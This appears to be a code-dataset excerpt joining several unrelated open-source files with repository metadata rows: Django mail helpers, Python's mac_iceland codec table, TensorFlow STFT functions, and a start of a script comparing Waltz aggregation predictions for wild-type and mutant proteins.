Note: The API for this method is frozen. New code wanting to extend the
functionality should use the EmailMessage class directly.
"""
connection = connection or get_connection(username=auth_user,
password=auth_password,
fail_silently=fail_silently)
messages = [EmailMessage(subject, message, sender, recipient,
connection=connection)
for subject, message, sender, recipient in datatuple]
return connection.send_messages(messages)
def mail_admins(subject, message, fail_silently=False, connection=None,
html_message=None):
"""Sends a message to the admins, as defined by the ADMINS setting."""
if not settings.ADMINS:
return
mail = EmailMultiAlternatives('%s%s' % (settings.EMAIL_SUBJECT_PREFIX, subject),
message, settings.SERVER_EMAIL, [a[1] for a in settings.ADMINS],
connection=connection)
if html_message:
mail.attach_alternative(html_message, 'text/html')
mail.send(fail_silently=fail_silently)
def mail_managers(subject, message, fail_silently=False, connection=None,
html_message=None):
"""Sends a message to the managers, as defined by the MANAGERS setting."""
if not settings.MANAGERS:
return
mail = EmailMultiAlternatives('%s%s' % (settings.EMAIL_SUBJECT_PREFIX, subject),
message, settings.SERVER_EMAIL, [a[1] for a in settings.MANAGERS],
connection=connection)
if html_message:
mail.attach_alternative(html_message, 'text/html')
mail.send(fail_silently=fail_silently)
| mit | -3,802,460,343,842,118,700 | 41.351351 | 84 | 0.677941 | false |
sdphome/UHF_Reader | rfs/rootfs/usr/lib/python2.7/encodings/mac_iceland.py | 593 | 13754 | """ Python Character Mapping Codec mac_iceland generated from 'MAPPINGS/VENDORS/APPLE/ICELAND.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='mac-iceland',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> CONTROL CHARACTER
u'\x01' # 0x01 -> CONTROL CHARACTER
u'\x02' # 0x02 -> CONTROL CHARACTER
u'\x03' # 0x03 -> CONTROL CHARACTER
u'\x04' # 0x04 -> CONTROL CHARACTER
u'\x05' # 0x05 -> CONTROL CHARACTER
u'\x06' # 0x06 -> CONTROL CHARACTER
u'\x07' # 0x07 -> CONTROL CHARACTER
u'\x08' # 0x08 -> CONTROL CHARACTER
u'\t' # 0x09 -> CONTROL CHARACTER
u'\n' # 0x0A -> CONTROL CHARACTER
u'\x0b' # 0x0B -> CONTROL CHARACTER
u'\x0c' # 0x0C -> CONTROL CHARACTER
u'\r' # 0x0D -> CONTROL CHARACTER
u'\x0e' # 0x0E -> CONTROL CHARACTER
u'\x0f' # 0x0F -> CONTROL CHARACTER
u'\x10' # 0x10 -> CONTROL CHARACTER
u'\x11' # 0x11 -> CONTROL CHARACTER
u'\x12' # 0x12 -> CONTROL CHARACTER
u'\x13' # 0x13 -> CONTROL CHARACTER
u'\x14' # 0x14 -> CONTROL CHARACTER
u'\x15' # 0x15 -> CONTROL CHARACTER
u'\x16' # 0x16 -> CONTROL CHARACTER
u'\x17' # 0x17 -> CONTROL CHARACTER
u'\x18' # 0x18 -> CONTROL CHARACTER
u'\x19' # 0x19 -> CONTROL CHARACTER
u'\x1a' # 0x1A -> CONTROL CHARACTER
u'\x1b' # 0x1B -> CONTROL CHARACTER
u'\x1c' # 0x1C -> CONTROL CHARACTER
u'\x1d' # 0x1D -> CONTROL CHARACTER
u'\x1e' # 0x1E -> CONTROL CHARACTER
u'\x1f' # 0x1F -> CONTROL CHARACTER
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> CONTROL CHARACTER
u'\xc4' # 0x80 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xc5' # 0x81 -> LATIN CAPITAL LETTER A WITH RING ABOVE
u'\xc7' # 0x82 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xc9' # 0x83 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xd1' # 0x84 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xd6' # 0x85 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x86 -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xe1' # 0x87 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe0' # 0x88 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe2' # 0x89 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe4' # 0x8A -> LATIN SMALL LETTER A WITH DIAERESIS
u'\xe3' # 0x8B -> LATIN SMALL LETTER A WITH TILDE
u'\xe5' # 0x8C -> LATIN SMALL LETTER A WITH RING ABOVE
u'\xe7' # 0x8D -> LATIN SMALL LETTER C WITH CEDILLA
u'\xe9' # 0x8E -> LATIN SMALL LETTER E WITH ACUTE
u'\xe8' # 0x8F -> LATIN SMALL LETTER E WITH GRAVE
u'\xea' # 0x90 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0x91 -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xed' # 0x92 -> LATIN SMALL LETTER I WITH ACUTE
u'\xec' # 0x93 -> LATIN SMALL LETTER I WITH GRAVE
u'\xee' # 0x94 -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xef' # 0x95 -> LATIN SMALL LETTER I WITH DIAERESIS
u'\xf1' # 0x96 -> LATIN SMALL LETTER N WITH TILDE
u'\xf3' # 0x97 -> LATIN SMALL LETTER O WITH ACUTE
u'\xf2' # 0x98 -> LATIN SMALL LETTER O WITH GRAVE
u'\xf4' # 0x99 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf6' # 0x9A -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf5' # 0x9B -> LATIN SMALL LETTER O WITH TILDE
u'\xfa' # 0x9C -> LATIN SMALL LETTER U WITH ACUTE
u'\xf9' # 0x9D -> LATIN SMALL LETTER U WITH GRAVE
u'\xfb' # 0x9E -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xfc' # 0x9F -> LATIN SMALL LETTER U WITH DIAERESIS
u'\xdd' # 0xA0 -> LATIN CAPITAL LETTER Y WITH ACUTE
u'\xb0' # 0xA1 -> DEGREE SIGN
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa7' # 0xA4 -> SECTION SIGN
u'\u2022' # 0xA5 -> BULLET
u'\xb6' # 0xA6 -> PILCROW SIGN
u'\xdf' # 0xA7 -> LATIN SMALL LETTER SHARP S
u'\xae' # 0xA8 -> REGISTERED SIGN
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u2122' # 0xAA -> TRADE MARK SIGN
u'\xb4' # 0xAB -> ACUTE ACCENT
u'\xa8' # 0xAC -> DIAERESIS
u'\u2260' # 0xAD -> NOT EQUAL TO
u'\xc6' # 0xAE -> LATIN CAPITAL LETTER AE
u'\xd8' # 0xAF -> LATIN CAPITAL LETTER O WITH STROKE
u'\u221e' # 0xB0 -> INFINITY
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\u2264' # 0xB2 -> LESS-THAN OR EQUAL TO
u'\u2265' # 0xB3 -> GREATER-THAN OR EQUAL TO
u'\xa5' # 0xB4 -> YEN SIGN
u'\xb5' # 0xB5 -> MICRO SIGN
u'\u2202' # 0xB6 -> PARTIAL DIFFERENTIAL
u'\u2211' # 0xB7 -> N-ARY SUMMATION
u'\u220f' # 0xB8 -> N-ARY PRODUCT
u'\u03c0' # 0xB9 -> GREEK SMALL LETTER PI
u'\u222b' # 0xBA -> INTEGRAL
u'\xaa' # 0xBB -> FEMININE ORDINAL INDICATOR
u'\xba' # 0xBC -> MASCULINE ORDINAL INDICATOR
u'\u03a9' # 0xBD -> GREEK CAPITAL LETTER OMEGA
u'\xe6' # 0xBE -> LATIN SMALL LETTER AE
u'\xf8' # 0xBF -> LATIN SMALL LETTER O WITH STROKE
u'\xbf' # 0xC0 -> INVERTED QUESTION MARK
u'\xa1' # 0xC1 -> INVERTED EXCLAMATION MARK
u'\xac' # 0xC2 -> NOT SIGN
u'\u221a' # 0xC3 -> SQUARE ROOT
u'\u0192' # 0xC4 -> LATIN SMALL LETTER F WITH HOOK
u'\u2248' # 0xC5 -> ALMOST EQUAL TO
u'\u2206' # 0xC6 -> INCREMENT
u'\xab' # 0xC7 -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0xC8 -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2026' # 0xC9 -> HORIZONTAL ELLIPSIS
u'\xa0' # 0xCA -> NO-BREAK SPACE
u'\xc0' # 0xCB -> LATIN CAPITAL LETTER A WITH GRAVE
u'\xc3' # 0xCC -> LATIN CAPITAL LETTER A WITH TILDE
u'\xd5' # 0xCD -> LATIN CAPITAL LETTER O WITH TILDE
u'\u0152' # 0xCE -> LATIN CAPITAL LIGATURE OE
u'\u0153' # 0xCF -> LATIN SMALL LIGATURE OE
u'\u2013' # 0xD0 -> EN DASH
u'\u2014' # 0xD1 -> EM DASH
u'\u201c' # 0xD2 -> LEFT DOUBLE QUOTATION MARK
u'\u201d' # 0xD3 -> RIGHT DOUBLE QUOTATION MARK
u'\u2018' # 0xD4 -> LEFT SINGLE QUOTATION MARK
u'\u2019' # 0xD5 -> RIGHT SINGLE QUOTATION MARK
u'\xf7' # 0xD6 -> DIVISION SIGN
u'\u25ca' # 0xD7 -> LOZENGE
u'\xff' # 0xD8 -> LATIN SMALL LETTER Y WITH DIAERESIS
u'\u0178' # 0xD9 -> LATIN CAPITAL LETTER Y WITH DIAERESIS
u'\u2044' # 0xDA -> FRACTION SLASH
u'\u20ac' # 0xDB -> EURO SIGN
u'\xd0' # 0xDC -> LATIN CAPITAL LETTER ETH
u'\xf0' # 0xDD -> LATIN SMALL LETTER ETH
u'\xde' # 0xDE -> LATIN CAPITAL LETTER THORN
u'\xfe' # 0xDF -> LATIN SMALL LETTER THORN
u'\xfd' # 0xE0 -> LATIN SMALL LETTER Y WITH ACUTE
u'\xb7' # 0xE1 -> MIDDLE DOT
u'\u201a' # 0xE2 -> SINGLE LOW-9 QUOTATION MARK
u'\u201e' # 0xE3 -> DOUBLE LOW-9 QUOTATION MARK
u'\u2030' # 0xE4 -> PER MILLE SIGN
u'\xc2' # 0xE5 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
u'\xca' # 0xE6 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
u'\xc1' # 0xE7 -> LATIN CAPITAL LETTER A WITH ACUTE
u'\xcb' # 0xE8 -> LATIN CAPITAL LETTER E WITH DIAERESIS
u'\xc8' # 0xE9 -> LATIN CAPITAL LETTER E WITH GRAVE
u'\xcd' # 0xEA -> LATIN CAPITAL LETTER I WITH ACUTE
u'\xce' # 0xEB -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
u'\xcf' # 0xEC -> LATIN CAPITAL LETTER I WITH DIAERESIS
u'\xcc' # 0xED -> LATIN CAPITAL LETTER I WITH GRAVE
u'\xd3' # 0xEE -> LATIN CAPITAL LETTER O WITH ACUTE
u'\xd4' # 0xEF -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
u'\uf8ff' # 0xF0 -> Apple logo
u'\xd2' # 0xF1 -> LATIN CAPITAL LETTER O WITH GRAVE
u'\xda' # 0xF2 -> LATIN CAPITAL LETTER U WITH ACUTE
u'\xdb' # 0xF3 -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
u'\xd9' # 0xF4 -> LATIN CAPITAL LETTER U WITH GRAVE
u'\u0131' # 0xF5 -> LATIN SMALL LETTER DOTLESS I
u'\u02c6' # 0xF6 -> MODIFIER LETTER CIRCUMFLEX ACCENT
u'\u02dc' # 0xF7 -> SMALL TILDE
u'\xaf' # 0xF8 -> MACRON
u'\u02d8' # 0xF9 -> BREVE
u'\u02d9' # 0xFA -> DOT ABOVE
u'\u02da' # 0xFB -> RING ABOVE
u'\xb8' # 0xFC -> CEDILLA
u'\u02dd' # 0xFD -> DOUBLE ACUTE ACCENT
u'\u02db' # 0xFE -> OGONEK
u'\u02c7' # 0xFF -> CARON
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| gpl-3.0 | -8,900,568,713,718,267,000 | 43.801303 | 116 | 0.543769 | false |
ZhangXinNan/tensorflow | tensorflow/contrib/signal/python/ops/spectral_ops.py | 27 | 12618 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Spectral operations (e.g. Short-time Fourier Transform)."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numpy as np
from tensorflow.contrib.signal.python.ops import reconstruction_ops
from tensorflow.contrib.signal.python.ops import shape_ops
from tensorflow.contrib.signal.python.ops import window_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import spectral_ops
def stft(signals, frame_length, frame_step, fft_length=None,
window_fn=functools.partial(window_ops.hann_window, periodic=True),
pad_end=False, name=None):
"""Computes the [Short-time Fourier Transform][stft] of `signals`.
Implemented with GPU-compatible ops and supports gradients.
Args:
signals: A `[..., samples]` `float32` `Tensor` of real-valued signals.
frame_length: An integer scalar `Tensor`. The window length in samples.
frame_step: An integer scalar `Tensor`. The number of samples to step.
fft_length: An integer scalar `Tensor`. The size of the FFT to apply.
If not provided, uses the smallest power of 2 enclosing `frame_length`.
window_fn: A callable that takes a window length and a `dtype` keyword
argument and returns a `[window_length]` `Tensor` of samples in the
provided datatype. If set to `None`, no windowing is used.
pad_end: Whether to pad the end of `signals` with zeros when the provided
frame length and step produces a frame that lies partially past its end.
name: An optional name for the operation.
Returns:
A `[..., frames, fft_unique_bins]` `Tensor` of `complex64` STFT values where
`fft_unique_bins` is `fft_length // 2 + 1` (the unique components of the
FFT).
Raises:
ValueError: If `signals` is not at least rank 1, `frame_length` is
not scalar, or `frame_step` is not scalar.
[stft]: https://en.wikipedia.org/wiki/Short-time_Fourier_transform
"""
with ops.name_scope(name, 'stft', [signals, frame_length,
frame_step]):
signals = ops.convert_to_tensor(signals, name='signals')
signals.shape.with_rank_at_least(1)
frame_length = ops.convert_to_tensor(frame_length, name='frame_length')
frame_length.shape.assert_has_rank(0)
frame_step = ops.convert_to_tensor(frame_step, name='frame_step')
frame_step.shape.assert_has_rank(0)
if fft_length is None:
fft_length = _enclosing_power_of_two(frame_length)
else:
fft_length = ops.convert_to_tensor(fft_length, name='fft_length')
framed_signals = shape_ops.frame(
signals, frame_length, frame_step, pad_end=pad_end)
# Optionally window the framed signals.
if window_fn is not None:
window = window_fn(frame_length, dtype=framed_signals.dtype)
framed_signals *= window
# spectral_ops.rfft produces the (fft_length/2 + 1) unique components of the
# FFT of the real windowed signals in framed_signals.
return spectral_ops.rfft(framed_signals, [fft_length])
def inverse_stft_window_fn(frame_step,
forward_window_fn=functools.partial(
window_ops.hann_window, periodic=True),
name=None):
"""Generates a window function that can be used in `inverse_stft`.
Constructs a window that is equal to the forward window with a further
pointwise amplitude correction. `inverse_stft_window_fn` is equivalent to
`forward_window_fn` in the case where it would produce an exact inverse.
See examples in `inverse_stft` documentation for usage.
Args:
frame_step: An integer scalar `Tensor`. The number of samples to step.
forward_window_fn: window_fn used in the forward transform, `stft`.
name: An optional name for the operation.
Returns:
A callable that takes a window length and a `dtype` keyword argument and
returns a `[window_length]` `Tensor` of samples in the provided datatype.
The returned window is suitable for reconstructing original waveform in
inverse_stft.
"""
with ops.name_scope(name, 'inverse_stft_window_fn', [forward_window_fn]):
frame_step = ops.convert_to_tensor(frame_step, name='frame_step')
frame_step.shape.assert_has_rank(0)
def inverse_stft_window_fn_inner(frame_length, dtype):
"""Computes a window that can be used in `inverse_stft`.
Args:
frame_length: An integer scalar `Tensor`. The window length in samples.
dtype: Data type of waveform passed to `stft`.
Returns:
A window suitable for reconstructing original waveform in `inverse_stft`.
Raises:
ValueError: If `frame_length` is not scalar, `forward_window_fn` is not a
callable that takes a window length and a `dtype` keyword argument and
returns a `[window_length]` `Tensor` of samples in the provided datatype
`frame_step` is not scalar, or `frame_step` is not scalar.
"""
with ops.name_scope(name, 'inverse_stft_window_fn', [forward_window_fn]):
frame_length = ops.convert_to_tensor(frame_length, name='frame_length')
frame_length.shape.assert_has_rank(0)
# Use equation 7 from Griffin + Lim.
forward_window = forward_window_fn(frame_length, dtype=dtype)
denom = math_ops.square(forward_window)
overlaps = -(-frame_length // frame_step) # Ceiling division.
denom = array_ops.pad(denom, [(0, overlaps * frame_step - frame_length)])
denom = array_ops.reshape(denom, [overlaps, frame_step])
denom = math_ops.reduce_sum(denom, 0, keepdims=True)
denom = array_ops.tile(denom, [overlaps, 1])
denom = array_ops.reshape(denom, [overlaps * frame_step])
return forward_window / denom[:frame_length]
return inverse_stft_window_fn_inner
def inverse_stft(stfts,
frame_length,
frame_step,
fft_length=None,
window_fn=functools.partial(window_ops.hann_window,
periodic=True),
name=None):
"""Computes the inverse [Short-time Fourier Transform][stft] of `stfts`.
To reconstruct an original waveform, a complimentary window function should
be used in inverse_stft. Such a window function can be constructed with
tf.contrib.signal.inverse_stft_window_fn.
Example:
```python
frame_length = 400
frame_step = 160
waveform = tf.placeholder(dtype=tf.float32, shape=[1000])
stft = tf.contrib.signal.stft(waveform, frame_length, frame_step)
inverse_stft = tf.contrib.signal.inverse_stft(
stft, frame_length, frame_step,
window_fn=tf.contrib.signal.inverse_stft_window_fn(frame_step))
```
if a custom window_fn is used in stft, it must be passed to
inverse_stft_window_fn:
```python
frame_length = 400
frame_step = 160
window_fn = functools.partial(window_ops.hamming_window, periodic=True),
waveform = tf.placeholder(dtype=tf.float32, shape=[1000])
stft = tf.contrib.signal.stft(
waveform, frame_length, frame_step, window_fn=window_fn)
inverse_stft = tf.contrib.signal.inverse_stft(
stft, frame_length, frame_step,
window_fn=tf.contrib.signal.inverse_stft_window_fn(
frame_step, forward_window_fn=window_fn))
```
Implemented with GPU-compatible ops and supports gradients.
Args:
stfts: A `complex64` `[..., frames, fft_unique_bins]` `Tensor` of STFT bins
representing a batch of `fft_length`-point STFTs where `fft_unique_bins`
is `fft_length // 2 + 1`
frame_length: An integer scalar `Tensor`. The window length in samples.
frame_step: An integer scalar `Tensor`. The number of samples to step.
fft_length: An integer scalar `Tensor`. The size of the FFT that produced
`stfts`. If not provided, uses the smallest power of 2 enclosing
`frame_length`.
window_fn: A callable that takes a window length and a `dtype` keyword
argument and returns a `[window_length]` `Tensor` of samples in the
provided datatype. If set to `None`, no windowing is used.
name: An optional name for the operation.
Returns:
A `[..., samples]` `Tensor` of `float32` signals representing the inverse
STFT for each input STFT in `stfts`.
Raises:
ValueError: If `stfts` is not at least rank 2, `frame_length` is not scalar,
`frame_step` is not scalar, or `fft_length` is not scalar.
[stft]: https://en.wikipedia.org/wiki/Short-time_Fourier_transform
"""
with ops.name_scope(name, 'inverse_stft', [stfts]):
stfts = ops.convert_to_tensor(stfts, name='stfts')
stfts.shape.with_rank_at_least(2)
frame_length = ops.convert_to_tensor(frame_length, name='frame_length')
frame_length.shape.assert_has_rank(0)
frame_step = ops.convert_to_tensor(frame_step, name='frame_step')
frame_step.shape.assert_has_rank(0)
if fft_length is None:
fft_length = _enclosing_power_of_two(frame_length)
else:
fft_length = ops.convert_to_tensor(fft_length, name='fft_length')
fft_length.shape.assert_has_rank(0)
real_frames = spectral_ops.irfft(stfts, [fft_length])
# frame_length may be larger or smaller than fft_length, so we pad or
# truncate real_frames to frame_length.
frame_length_static = tensor_util.constant_value(frame_length)
# If we don't know the shape of real_frames's inner dimension, pad and
# truncate to frame_length.
if (frame_length_static is None or
real_frames.shape.ndims is None or
real_frames.shape[-1].value is None):
real_frames = real_frames[..., :frame_length]
real_frames_rank = array_ops.rank(real_frames)
real_frames_shape = array_ops.shape(real_frames)
paddings = array_ops.concat(
[array_ops.zeros([real_frames_rank - 1, 2],
dtype=frame_length.dtype),
[[0, math_ops.maximum(0, frame_length - real_frames_shape[-1])]]], 0)
real_frames = array_ops.pad(real_frames, paddings)
# We know real_frames's last dimension and frame_length statically. If they
# are different, then pad or truncate real_frames to frame_length.
elif real_frames.shape[-1].value > frame_length_static:
real_frames = real_frames[..., :frame_length_static]
elif real_frames.shape[-1].value < frame_length_static:
pad_amount = frame_length_static - real_frames.shape[-1].value
real_frames = array_ops.pad(real_frames,
[[0, 0]] * (real_frames.shape.ndims - 1) +
[[0, pad_amount]])
# The above code pads the inner dimension of real_frames to frame_length,
# but it does so in a way that may not be shape-inference friendly.
# Restore shape information if we are able to.
if frame_length_static is not None and real_frames.shape.ndims is not None:
real_frames.set_shape([None] * (real_frames.shape.ndims - 1) +
[frame_length_static])
# Optionally window and overlap-add the inner 2 dimensions of real_frames
# into a single [samples] dimension.
if window_fn is not None:
window = window_fn(frame_length, dtype=stfts.dtype.real_dtype)
real_frames *= window
return reconstruction_ops.overlap_and_add(real_frames, frame_step)
def _enclosing_power_of_two(value):
"""Return 2**N for integer N such that 2**N >= value."""
value_static = tensor_util.constant_value(value)
if value_static is not None:
return constant_op.constant(
int(2**np.ceil(np.log(value_static) / np.log(2.0))), value.dtype)
return math_ops.cast(
math_ops.pow(2.0, math_ops.ceil(
math_ops.log(math_ops.to_float(value)) / math_ops.log(2.0))),
value.dtype)
| apache-2.0 | 7,066,219,557,007,325,000 | 42.965157 | 80 | 0.677366 | false |
najmacherrad/master_thesis | Waltz/plotcomparaisons_waltz.py | 1 | 7577 | # Waltz
# Compare results between wild type and mutant
# coding=utf-8
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import csv
from scipy import stats
from pylab import plot, show, savefig, xlim, figure, \
hold, ylim, legend, boxplot, setp, axes
import pylab
from numpy import *
def getColumn(filename, column,deli):
results = csv.reader(open(filename), delimiter=deli)
return [result[column] for result in results]
#import files
file_wt = 'waltzresults_wt.csv'
file_mut = 'waltzresults_mut.csv'
#------------------------------------
# AGGREGATION
#------------------------------------
#--------------------------------------
# SCATTER PLOT
pred_wt = getColumn(file_wt,3,'\t')
pred_mut = getColumn(file_mut,3,'\t')
pred_wt.pop(0)
pred_mut.pop(0)
x,y=[],[]
for i in range(0,len(pred_wt)): #max=98.662207
if pred_wt[i]=='NA':
x.append(np.nan)
else:
x.append(float(pred_wt[i]))
for i in range(0,len(pred_mut)): #max=99.665552
if pred_mut[i]=='NA':
y.append(np.nan)
else:
y.append(float(pred_mut[i]))
fig = plt.figure()
a=b=[0,100]
plt.scatter(x, y,edgecolor = 'none', c= 'k')
plt.plot(a,b,'r-')
plt.grid('on')
plt.xlim(-1,101)
plt.ylim(-1,101)
plt.xlabel('Wild types')
plt.ylabel('Deleterious DIDA mutants')
fig.savefig('waltz_wtVSmut.jpg')
#----------------
# PROBABILITY DENSITY CURVE
fig = figure()
mu1, std1 = stats.norm.fit(x)
mu2, std2 = stats.norm.fit(y)
xmin1, xmax1 = plt.xlim()
xmin2, xmax2 = plt.xlim()
x1 = np.linspace(xmin1, 100, 100)
x2 = np.linspace(xmin2, 100, 100)
p1 = stats.norm.pdf(x1, mu1, std1)
p2 = stats.norm.pdf(x2, mu2, std2)
plt.plot(x1, p1, 'k',label='Wild types (fit results: mu=%.2f,std=%.2f)'%(mu1, std1))
plt.plot(x2, p2, 'r',label='Deleterious DIDA mutants \n(fit results: mu=%.2f,std=%.2f)'%(mu2, std2))
plt.xlabel('Aggregation conformation predicted values (amylogenic regions)')
plt.ylabel('Frequency')
plt.xlim(0,100)
#plt.ylim(0,0.0)
plt.legend(loc='upper right')
fig.savefig('histwaltz_missense.png')
#missense_wt - missense_mut
miss=[]
[miss.append(a_i - b_i) for a_i, b_i in zip(x, y)]
#KOLMOGOROV-SMINORV:
stats.kstest(miss,'norm') # (D,pvalue) = (0.3552063996073398, 0.0)
#So we reject H0 -> not normal distribution
#WILCOXON TEST:
stats.wilcoxon(miss) # (T, pvalue) = (4898.0, 0.29548245005836105)
#So we do not reject H0 -> There is no significant difference between wt and mut
#--------------------------------------
# AGGREGATION ENVIRONMENT
#--------------------------------------
#--------------------------------------
# SCATTER PLOT
pred_wt = getColumn(file_wt,4,'\t')
pred_mut = getColumn(file_mut,4,'\t')
